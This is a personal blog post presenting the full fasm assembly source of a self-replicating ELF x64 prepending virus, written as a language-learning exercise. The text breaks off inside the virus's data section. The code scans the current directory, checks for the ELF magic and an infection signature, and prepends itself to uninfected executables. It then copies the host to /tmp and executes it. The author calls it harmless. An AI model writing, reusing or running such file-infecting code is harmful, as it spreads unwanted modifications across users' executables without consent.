<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>ELF x64 Virus in fasm assembly | amoebatron</title>
<meta name="generator" content="Jekyll v4.3.2" />
<meta property="og:title" content="ELF x64 Virus in fasm assembly" />
<meta name="author" content="Furqan" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Recently, I was playing around with flat assembler and i needed something to write in it. I tried “Hello world” program but it was not enough. I believe that generally “Hello world” programs are not a good way to learn about details of a programming language, especially for somewhat experienced programmers." />
<meta property="og:description" content="Recently, I was playing around with flat assembler and i needed something to write in it. I tried “Hello world” program but it was not enough. I believe that generally “Hello world” programs are not a good way to learn about details of a programming language, especially for somewhat experienced programmers." />
<link rel="canonical" href="http://localhost:4000/2022/10/16/elf-x64-virus-fasm.html" />
<meta property="og:url" content="http://localhost:4000/2022/10/16/elf-x64-virus-fasm.html" />
<meta property="og:site_name" content="amoebatron" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2022-10-16T12:47:18+02:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="ELF x64 Virus in fasm assembly" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Furqan"},"dateModified":"2022-10-16T12:47:18+02:00","datePublished":"2022-10-16T12:47:18+02:00","description":"Recently, I was playing around with flat assembler and i needed something to write in it. I tried “Hello world” program but it was not enough. I believe that generally “Hello world” programs are not a good way to learn about details of a programming language, especially for somewhat experienced programmers.","headline":"ELF x64 Virus in fasm assembly","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2022/10/16/elf-x64-virus-fasm.html"},"url":"http://localhost:4000/2022/10/16/elf-x64-virus-fasm.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/style.css"><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="amoebatron" />


<link rel="apple-touch-icon" sizes="120x120" href="/assets/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/favicons/favicon-16x16.png">
<link rel="manifest" href="/assets/favicons/site.webmanifest">
<link rel="mask-icon" href="/assets/favicons/safari-pinned-tab.svg" color="#5bbad5">
<link rel="shortcut icon" href="/assets/favicons/favicon.ico">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">

<meta property="og:image" content="https://furqantariq.github.io/assets/img/share.gif">
<meta property="og:image:height" content="335">
<meta property="og:image:width" content="640">
<meta property="og:title" content="amoebatron's personal blog">
<meta property="og:description" content="">
<meta property="og:url" content="https://furqantariq.github.io">

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

<script>
MathJax = {
  tex: {
    inlineMath: [['$','$'], ['\\(','\\)']],
    displayMath: [['$$','$$'], ['\\[','\\]']],
    processEnvironments: true
  },
  svg: {
    fontCache: 'global'
  }
};
</script>
<script type="text/javascript" id="MathJax-script" async
  src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-svg.js">
</script>


</head>
<body><header class="site-header">

  <div class="wrapper"><a class="site-title" rel="author" href="/">amoebatron</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/twitch/">Twitch</a><a class="page-link" href="/about/">About</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">ELF x64 Virus in fasm assembly</h1>
    <p class="post-meta"><time class="dt-published" datetime="2022-10-16T12:47:18+02:00" itemprop="datePublished">
        Oct 16, 2022
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <p>Recently, I was playing around with <a href="https://flatassembler.net/">flat assembler</a> and i needed something to
write in it. I tried <a href="https://en.wikipedia.org/wiki/%22Hello,_World!%22_program">“Hello world” program</a> but it was not
enough. I believe that generally “Hello world” programs are not a good way to learn about details of a programming 
language, especially for somewhat experienced programmers.</p>

<p>So I wrote a virus to familiarize myself to it. Because it is compact and has a everything from condition 
control flows to loop constructs, not just printing out in standard output and it only took me couple of hours to write it.</p>

<p>The virus is a harmless prepending virus which copies itself to the top of the infected program and infected program does 
absolutley nothing harmful except printing a message that it is infected.
The virus only infects <a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format">ELF</a> 
files which are present in current directory (not subdirectories) and smaller than 4KB in size to prevent any potential misuse.</p>

<p><strong>CODE: virus.asm</strong></p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">; Written by Furqan</span>
<span class="c1">;</span>
<span class="c1">; The virus can be assembled with only Fasm.x64 and</span>
<span class="c1">; make sure to append virus signature</span>
<span class="c1">; compilation:</span>
<span class="c1">;   fasm.x64 virus.asm &amp;&amp; printf "\x7e\x49\x4e\x46\x7e" &gt;&gt; virus</span>
<span class="c1">;</span>

<span class="nf">format</span> <span class="nv">ELF64</span> <span class="nv">executable</span> <span class="mi">3</span>

<span class="nf">segment</span> <span class="nv">readable</span> <span class="nv">executable</span>
<span class="err">@@:</span>
    <span class="nf">sub</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">2000</span>

    <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x2</span>
    <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsp</span><span class="o">+</span><span class="mi">2008</span><span class="p">]</span>
    <span class="nf">xor</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rsi</span>
    <span class="nf">xor</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rdx</span>
    <span class="nf">syscall</span>

    <span class="nf">mov</span> <span class="nv">r9</span><span class="p">,</span> <span class="nb">rax</span>

    <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x0</span>
    <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r9</span>
    <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">self</span>
    <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nv">self_size</span>
    <span class="nf">syscall</span>

    <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x8</span>
    <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r9</span>
    <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">vsignl</span>
    <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mh">0x1</span>
    <span class="nf">syscall</span>

    <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x0</span>
    <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r9</span>
    <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">host</span>
    <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nv">max_size</span>
    <span class="nf">syscall</span>

    <span class="nf">push</span> <span class="nb">rax</span>

    <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x3</span>
    <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r9</span>
    <span class="nf">syscall</span>

    <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x2</span>
    <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">cwdd</span>
    <span class="nf">xor</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rsi</span>
    <span class="nf">xor</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rdx</span>
    <span class="nf">syscall</span>

    <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span>
    <span class="nf">js</span> <span class="nv">virus</span>

    <span class="nf">push</span> <span class="nb">rax</span>

    <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rax</span>
    <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0xd9</span>
    <span class="nf">lea</span> <span class="nb">rsi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsp</span> <span class="o">+</span> <span class="mi">200</span> <span class="o">+</span> <span class="nb">DI</span><span class="nv">RENT</span><span class="p">]</span>
    <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mi">800</span>
    <span class="nf">syscall</span>

    <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span>
    <span class="nf">js</span> <span class="nv">finscan</span>

    <span class="nf">mov</span> <span class="nv">r10</span><span class="p">,</span> <span class="nb">rax</span>
    <span class="nf">xor</span> <span class="nv">r9</span><span class="p">,</span> <span class="nv">r9</span>

<span class="nl">scan:</span>
    <span class="nf">cmp</span> <span class="p">[</span><span class="nb">rsp</span> <span class="o">+</span> <span class="nv">r9</span> <span class="o">+</span> <span class="mi">200</span> <span class="o">+</span> <span class="nb">DI</span><span class="nv">RENT.d_type</span><span class="p">],</span> <span class="mh">0x8</span>
    <span class="nf">jne</span> <span class="nv">.continue</span>

    <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x2</span>
    <span class="nf">lea</span> <span class="nb">rdi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsp</span> <span class="o">+</span> <span class="nv">r9</span> <span class="o">+</span> <span class="mi">200</span> <span class="o">+</span> <span class="nb">DI</span><span class="nv">RENT.d_name</span><span class="p">]</span>
    <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="mh">0x2</span>
    <span class="nf">xor</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rdx</span>
    <span class="nf">syscall</span>

    <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span>
    <span class="nf">js</span> <span class="nv">.continue</span>

    <span class="nf">push</span> <span class="nb">rax</span>

    <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x0</span>
    <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsp</span><span class="p">]</span>
    <span class="nf">lea</span> <span class="nb">rsi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsp</span> <span class="o">+</span> <span class="mi">1100</span><span class="p">]</span>
    <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mi">4</span>
    <span class="nf">syscall</span>

    <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">elfmagic</span>
    <span class="nf">mov</span> <span class="nb">rcx</span><span class="p">,</span> <span class="mi">4</span>
    <span class="nf">rep</span> <span class="nv">cmpsb</span>
    <span class="nf">jne</span> <span class="nv">.close</span>

    <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x8</span>
    <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsp</span><span class="p">]</span>
    <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">self_size</span>
    <span class="nf">xor</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rdx</span>
    <span class="nf">syscall</span>

    <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x0</span>
    <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsp</span><span class="p">]</span>
    <span class="nf">lea</span> <span class="nb">rsi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsp</span> <span class="o">+</span> <span class="mi">1100</span><span class="p">]</span>
    <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nv">vsignl</span>
    <span class="nf">syscall</span>

    <span class="nf">cmp</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">vsignl</span>
    <span class="nf">jl</span> <span class="nv">.infect</span>

    <span class="nf">lea</span> <span class="nb">rsi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsp</span> <span class="o">+</span> <span class="mi">1100</span><span class="p">]</span>
    <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">vsign</span>
    <span class="nf">mov</span> <span class="nb">rcx</span><span class="p">,</span> <span class="nv">vsignl</span>
    <span class="nf">rep</span> <span class="nv">cmpsb</span>
    <span class="nf">je</span> <span class="nv">.close</span>

    <span class="nl">.infect:</span>
        <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x8</span>
        <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsp</span><span class="p">]</span>
        <span class="nf">xor</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rsi</span>
        <span class="nf">xor</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rdx</span>
        <span class="nf">syscall</span>

        <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x0</span>
        <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsp</span><span class="p">]</span>
        <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">infected</span>
        <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nv">max_size</span>
        <span class="nf">syscall</span>

        <span class="nf">mov</span> <span class="nv">r15</span><span class="p">,</span> <span class="nb">rax</span>

        <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x8</span>
        <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsp</span><span class="p">]</span>
        <span class="nf">xor</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rsi</span>
        <span class="nf">xor</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rdx</span>
        <span class="nf">syscall</span>

        <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x1</span>
        <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsp</span><span class="p">]</span>
        <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">self</span>
        <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nv">self_size</span>
        <span class="nf">syscall</span>

        <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x1</span>
        <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsp</span><span class="p">]</span>
        <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">vsign</span>
        <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nv">vsignl</span>
        <span class="nf">syscall</span>

        <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x1</span>
        <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsp</span><span class="p">]</span>
        <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">infected</span>
        <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nv">r15</span>
        <span class="nf">syscall</span>

    <span class="nl">.close:</span>
        <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x3</span>
        <span class="nf">pop</span> <span class="nb">rdi</span>
        <span class="nf">syscall</span>

    <span class="nl">.continue:</span>
        <span class="nf">add</span> <span class="nb">r9w</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsp</span> <span class="o">+</span> <span class="nv">r9</span> <span class="o">+</span> <span class="mi">200</span> <span class="o">+</span> <span class="nb">DI</span><span class="nv">RENT.d_reclen</span><span class="p">]</span>
        <span class="nf">cmp</span> <span class="nv">r9</span><span class="p">,</span> <span class="nv">r10</span>
        <span class="nf">jl</span> <span class="nv">scan</span>

<span class="nl">finscan:</span>
    <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x3</span>
    <span class="nf">pop</span> <span class="nb">rdi</span>
    <span class="nf">syscall</span>


<span class="nl">virus:</span>

    <span class="nf">pop</span> <span class="nv">r9</span>
    <span class="nf">cmp</span> <span class="nv">r9</span><span class="p">,</span> <span class="mi">0</span>
    <span class="nf">jle</span> <span class="nv">.exit</span>

    <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x1</span>
    <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="mh">0x1</span>
    <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">msg</span>
    <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nv">msgl</span>
    <span class="nf">syscall</span>

    <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x55</span>
    <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">tmpf</span>
    <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="mi">777</span><span class="nv">o</span>
    <span class="nf">syscall</span>

    <span class="nf">mov</span> <span class="nv">r15</span><span class="p">,</span> <span class="nb">rax</span>

    <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x1</span>
    <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r15</span>
    <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">host</span>
    <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nv">r9</span>
    <span class="nf">syscall</span>

    <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x3</span>
    <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">r15</span>
    <span class="nf">syscall</span>

    <span class="nf">add</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">2000</span>

    <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x3b</span>
    <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nv">tmpf</span>
    <span class="nf">xor</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rsi</span>
    <span class="nf">xor</span> <span class="nb">rdx</span><span class="p">,</span> <span class="nb">rdx</span>
    <span class="nf">syscall</span>

    <span class="nl">.exit:</span>
        <span class="nf">xor</span>     <span class="nb">edi</span><span class="p">,</span><span class="nb">edi</span>
        <span class="nf">mov</span>     <span class="nb">eax</span><span class="p">,</span><span class="mi">60</span>
        <span class="nf">syscall</span>

<span class="nf">segment</span> <span class="nv">readable</span> <span class="nv">writeable</span>
<span class="nf">cwdd</span> <span class="nv">db</span> <span class="mh">0x2e</span><span class="p">,</span><span class="mh">0x00</span>
<span class="nf">tmpf</span> <span class="nv">db</span> <span class="mh">0x2f</span><span class="p">,</span> <span class="mh">0x74</span><span class="p">,</span> <span class="mh">0x6d</span><span class="p">,</span> <span class="mh">0x70</span><span class="p">,</span> <span class="mh">0x2f</span><span class="p">,</span> <span class="mh">0x35</span><span class="p">,</span> <span class="mh">0x35</span><span class="p">,</span> <span class="mh">0x36</span><span class="p">,</span> <span class="mh">0x35</span><span class="p">,</span> <span class="mh">0x00</span>
<span class="nf">vsign</span> <span class="nv">db</span> <span class="mh">0x7e</span><span class="p">,</span> <span class="mh">0x49</span><span class="p">,</span> <span class="mh">0x4e</span><span class="p">,</span> <span class="mh">0x46</span><span class="p">,</span> <span class="mh">0x7e</span>
<span class="nf">vsignl</span> <span class="err">=</span> <span class="kc">$</span><span class="o">-</span><span class="nv">vsign</span>
<span class="nf">msg</span> <span class="nv">db</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x5f</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x5f</span><span class="p">,</span> <span class="mh">0x0a</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x5f</span><span class="p">,</span> <span class="mh">0x28</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x29</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x28</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x29</span><span class="p">,</span> <span class="mh">0x5f</span><span class="p">,</span> <span class="mh">0x0a</span><span class="p">,</span> <span class="mh">0x28</span><span class="p">,</span> <span class="mh">0x5f</span><span class="p">,</span> <span class="mh">0x2c</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x7c</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x5f</span><span class="p">,</span> <span class="mh">0x5f</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x5f</span><span class="p">,</span> <span class="mh">0x5f</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x7c</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x2c</span><span class="p">,</span> <span class="mh">0x5f</span><span class="p">,</span> <span class="mh">0x29</span><span class="p">,</span> <span class="mh">0x0a</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x5c</span><span class="p">,</span> <span class="mh">0x27</span><span class="p">,</span> <span class="mh">0x5c</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x2f</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x5e</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x5c</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x2f</span><span class="p">,</span> <span class="mh">0x27</span><span class="p">,</span> <span class="mh">0x2f</span><span class="p">,</span> <span class="mh">0x0a</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x27</span><span class="p">,</span> <span class="mh">0x5c</span><span class="p">,</span> <span class="mh">0x27</span><span class="p">,</span> <span class="mh">0x5c</span><span class="p">,</span> <span class="mh">0x2c</span><span class="p">,</span> <span class="mh">0x2f</span><span class="p">,</span> <span class="mh">0x5c</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x5c</span><span class="p">,</span> <span class="mh">0x2c</span><span class="p">,</span> <span class="mh">0x2f</span><span class="p">,</span> <span class="mh">0x27</span><span class="p">,</span> <span class="mh">0x2f</span><span class="p">,</span> <span class="mh">0x27</span><span class="p">,</span> <span class="mh">0x0a</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x27</span><span class="p">,</span> <span class="mh">0x5c</span><span class="p">,</span> <span class="mh">0x7c</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x5b</span><span class="p">,</span> <span class="mh">0x5d</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x5b</span><span class="p">,</span> <span class="mh">0x5d</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x7c</span><span class="p">,</span> <span class="mh">0x2f</span><span class="p">,</span> <span class="mh">0x27</span><span class="p">,</span> <span class="mh">0x0a</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x28</span><span class="p">,</span> <span class="mh">0x5f</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x2f</span><span class="p">,</span> <span class="mh">0x5e</span><span class="p">,</span> <span class="mh">0x5c</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x5f</span><span class="p">,</span> <span class="mh">0x29</span><span class="p">,</span> <span class="mh">0x0a</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x5c</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x7e</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x2f</span><span class="p">,</span> <span class="mh">0x0a</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x2f</span><span class="p">,</span> <span class="mh">0x48</span><span class="p">,</span> <span 